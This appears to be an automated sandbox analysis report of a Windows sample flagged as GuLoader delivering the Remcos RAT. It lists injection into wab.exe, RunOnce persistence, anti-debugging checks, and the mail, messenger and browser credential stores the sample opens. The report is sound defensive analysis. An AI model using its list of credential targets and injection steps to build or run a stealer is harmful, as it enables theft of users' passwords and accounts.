              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,11_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQJump to behavior
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeFile created: C:\Users\user\AppData\Local\Temp\nsu1FBE.tmpJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/19@4/3
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00402104 CoCreateInstance,5_2_00402104
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404722
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.54485525601.0000000035210000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: wab.exe, 00000009.00000003.49632395621.00000000059B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,9_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,9_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,9_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: Process Memory Space: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe PID: 8164, type: MEMORYSTR
              Source: Yara matchFile source: 00000005.00000002.49572727235.0000000003718000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2806 push ecx; ret 7_2_352D2819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00444355 push ecx; ret 10_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004446D0 push eax; ret 10_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004446D0 push eax; ret 10_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AC84 push eax; ret 10_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_6F261B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_6F261B5F
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeFile created: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SundhedspolitikkenJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SundhedspolitikkenJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SundhedspolitikkenJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SundhedspolitikkenJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004047C6
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5928Thread sleep count: 3601 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1088Thread sleep count: 62 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1088Thread sleep time: -31000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5108Thread sleep time: -57000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5108Thread sleep count: 5323 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5108Thread sleep time: -15969000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3601 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3601Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5323Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1741Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_004059CC
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_352D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D6580 FindFirstFileExA,7_2_352D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeAPI call chain: ExitProcess graph end nodegraph_5-4322
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeAPI call chain: ExitProcess graph end nodegraph_5-4327
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_10-33898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\paqlgkfs.datJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\bxujegjzJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\rdhzlJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_352D60E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_6F261B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_6F261B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D724E GetProcessHeap,7_2_352D724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D4AB4 mov eax, dword ptr fs:[00000030h]7_2_352D4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_352D60E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_352D2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_352D2639

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3030000Jump to behavior
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 7E3008Jump to behavior
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngaybJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzlJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjzJump to behavior
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, paqlgkfs.dat.7.drBinary or memory string: [2023/10/26 14:28:54 Program Manager]
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A66000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000003.49587174194.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.49587142774.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/26 14:28:49 Program Manager]
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2933 cpuid 7_2_352D2933
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_352D2264
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,10_2_00408043

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword10_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword10_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword10_2_00402DA5
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3368, type: MEMORYSTR
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)212
              Process Injection              		1
              DLL Side-Loading              		2
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder              		1
              Masquerading              		1
              Credentials In Files              		28
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		Scheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion              		LSA Secrets31
